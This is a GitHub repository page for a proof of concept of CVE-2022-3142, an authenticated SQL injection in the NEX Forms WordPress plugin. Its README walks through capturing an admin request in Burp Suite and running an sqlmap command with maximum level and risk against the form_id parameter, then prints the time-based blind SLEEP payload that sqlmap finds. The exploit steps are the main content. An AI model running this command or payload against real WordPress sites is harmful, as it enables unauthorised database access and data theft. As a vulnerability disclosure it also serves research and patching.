Skip to content
/ nex-forms-exploit Public

Authenticatd SQL injection vulnerability in the "NEX Forms" Wordpress plugin

License

MIT license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ehtec/nex-forms-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.txt
exploit.txt
 
 
nex_forms_req.txt
nex_forms_req.txt
 
 

Repository files navigation

nex-forms-exploit

Authenticatd SQL injection vulnerability in the "NEX Forms" Wordpress plugin

https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5

This vulnerability has been assigned CVE-2022-3142.

https://nvd.nist.gov/vuln/detail/CVE-2022-3142

  1. Start a new Wordpress instance using docker-compose.

  2. Install the NEX Forms plugin.

  3. Open the URL /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1 in your browser. Save the request to nex-forms-req.txt via Burp Suite.

  4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3

sqlmap will find a time-based blind payload:

Parameter: form_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)

About

Authenticatd SQL injection vulnerability in the "NEX Forms" Wordpress plugin

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published